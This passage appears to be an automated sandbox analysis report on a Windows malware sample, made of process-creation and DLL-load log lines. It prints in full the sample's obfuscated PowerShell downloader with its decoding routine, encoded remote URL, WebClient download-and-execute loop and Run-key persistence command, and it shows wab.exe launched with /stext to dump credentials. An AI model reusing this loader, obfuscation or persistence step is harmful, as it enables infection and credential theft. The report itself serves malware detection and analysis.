';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
